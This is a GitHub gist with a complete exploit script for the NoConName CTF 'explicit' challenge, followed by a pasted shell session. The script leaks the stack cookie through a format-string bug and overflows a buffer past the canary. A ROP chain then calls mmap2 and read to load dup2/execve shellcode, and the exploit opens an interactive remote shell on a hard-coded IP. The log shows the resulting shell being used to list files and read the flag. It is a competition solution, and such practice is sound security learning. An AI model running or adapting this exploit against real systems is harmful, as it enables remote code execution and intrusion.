Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#
#NoConName CTF
#explitcit exploit 500pts
#
s = NullSocket("88.87.208.163", 7070)
print s.readuntil("20: ")
s.writeline("%70$08X")
s.readuntil("is ")
#cookie = 0xC0951F00
cookie = int(s.read(8), 16)
s.readuntil("20: ")
padding_cookie = 0x100
padding_ret = 0x110
fd = 4
sys_write = 0x0805EFAA
sys_read = 0x0805EF4A
sys_mmap2 = 0x0805F960
exec_addr = 0x43440000
pop_7_ret = 0x080494d7 #add esp 0x1C; retn
shellcode = NullShell("dup2").get(fd) + NullShell("exec").get()
print "Shellcode: " + shellcode.encode('hex')
shellcode = "\x90" * 16 + shellcode
payload = "q" #finish loop
payload += "A" * (padding_cookie - len(payload))
payload += pack(cookie)
payload += "B" * (padding_ret - len(payload))
#call mmap2
payload += pack(sys_mmap2)
payload += pack(pop_7_ret)
payload += pack(exec_addr) #address
payload += pack(0x00010000) #size
payload += pack(7) #permisos
payload += pack(0x32) #permisos
payload += pack(0xFFFFFFFF) #
payload += pack(0)
payload += "D" * 4
#call fread
payload += pack(sys_read)
payload += pack(exec_addr) #return to shellcode
payload += pack(fd) #fd
payload += pack(exec_addr)
payload += pack(len(shellcode))
print hex(len(shellcode))
print "[!] Send payload"
s.writeline(payload)
time.sleep(1)
print "[!] Send shellcode"
s.write(shellcode)
print "[*] Got shell..."
s.interactive()
'''
$ python explicit.py
Welcome to Guess The Number Online!
Pick a number between 0 and 20:
Shellcode: 31db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80
[!] Send payload
[!] Send shellcode
[*] Got shell...
Bye
id
uid=1006(ch5) gid=1006(ch5) groups=1006(ch5)
ls -la
total 88
drwxr-xr-x 22 root root 4096 Sep 13 17:48 .
drwxr-xr-x 22 root root 4096 Sep 13 17:48 ..
drwxr-xr-x 2 root root 4096 Sep 12 17:57 bin
drwxr-xr-x 2 root root 4096 Jun 11 23:07 boot
drwxr-xr-x 3 root root 4096 Sep 12 17:40 dev
drwxr-xr-x 51 root root 4096 Sep 13 19:58 etc
drwxr-xr-x 3 root root 4096 Sep 13 18:34 home
drwxr-xr-x 11 root root 4096 Sep 12 17:40 lib
drwxr-xr-x 2 root root 4096 Sep 12 17:51 lib64
drwxr-xr-x 2 root root 4096 Sep 12 17:38 media
drwxr-xr-x 2 root root 4096 Jun 11 23:07 mnt
drwxr-xr-x 2 root root 4096 Sep 12 17:38 opt
drwxr-xr-x 2 root root 4096 Jun 11 23:07 proc
drwx------ 2 root root 4096 Sep 13 18:41 root
drwxr-xr-x 6 root root 4096 Sep 13 18:30 run
drwxr-xr-x 2 root root 4096 Sep 12 17:51 sbin
drwxr-xr-x 2 root root 4096 Jun 10 2012 selinux
drwxr-xr-x 2 root root 4096 Sep 12 17:38 srv
drwxr-xr-x 2 root root 4096 Jul 14 2013 sys
drwxrwxrwt 3 root root 4096 Sep 14 03:01 tmp
drwxr-xr-x 10 root root 4096 Sep 12 17:38 usr
drwxr-xr-x 12 root root 4096 Sep 12 17:57 var
cd /home
ls
ch5
cd ch5
ls -la
total 600
drwxr-xr-x 2 ch5 ch5 4096 Sep 14 02:50 .
drwxr-xr-x 3 root root 4096 Sep 13 18:34 ..
-rw------- 1 ch5 ch5 337 Sep 14 02:50 .bash_history
-rw-r--r-- 1 ch5 ch5 220 Dec 30 2012 .bash_logout
-rw-r--r-- 1 ch5 ch5 3392 Dec 30 2012 .bashrc
-rw-r--r-- 1 ch5 ch5 675 Dec 30 2012 .profile
-rwxr-xr-x 1 root root 583172 Sep 13 19:58 explicit
-rw-r--r-- 1 root root 45 Sep 14 01:31 flag.txt
-rw------- 1 ch5 ch5 0 Sep 13 21:31 nohup.out
cat flag.txt
NcN_97740ead1060892a253be8ca33c6364a712b21d2
exit
*** Connection closed by remote host ***
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.